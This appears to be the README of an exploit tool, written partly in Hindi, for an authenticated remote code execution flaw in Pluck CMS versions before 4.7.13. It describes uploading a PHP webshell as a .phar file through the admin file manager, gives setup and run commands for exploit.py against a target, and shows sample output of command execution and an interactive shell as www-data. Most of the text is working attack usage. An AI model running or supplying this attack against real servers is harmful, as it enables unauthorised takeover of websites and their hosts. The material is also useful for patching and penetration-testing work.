
Pluck CMS 4.7.13 से पहले के संस्करणों में प्रमाणित रिमोट कोड निष्पादन।
Pluck CMS 4.7.13 से पहले के संस्करण में प्रमाणित दूरस्थ कोड निष्पादन। एडमिन फ़ाइल प्रबंधक (
admin.php?action=files) फ़ाइल एक्सटेंशन को मान्य नहीं करता, जिससे.pharफ़ाइलें अपलोड की जा सकती हैं जिन्हें Apache PHP के रूप में निष्पादित करता है। इस एंडपॉइंट के माध्यम से वेबशेल अपलोड करने से वेब सर्वर उपयोगकर्ता के रूप में RCE होता है।
shell.phar के रूप में PHP वेबशेल अपलोड करता है।id चलाकर निष्पादन की पुष्टि करता है।python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
# Pluck at root
python3 exploit.py -u http://TARGET -p ADMIN_PASSWORD
# Pluck in a subdirectory
python3 exploit.py -u http://TARGET -p ADMIN_PASSWORD --path /pluck
उदाहरण:
$ python3 exploit.py -u http://10.10.10.10 -p admin123
[*] Logging in...
[+] Logged in
[*] Uploading webshell...
[+] Webshell uploaded
[*] Shell URL: http://10.10.10.10/files/shell.phar
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
www-data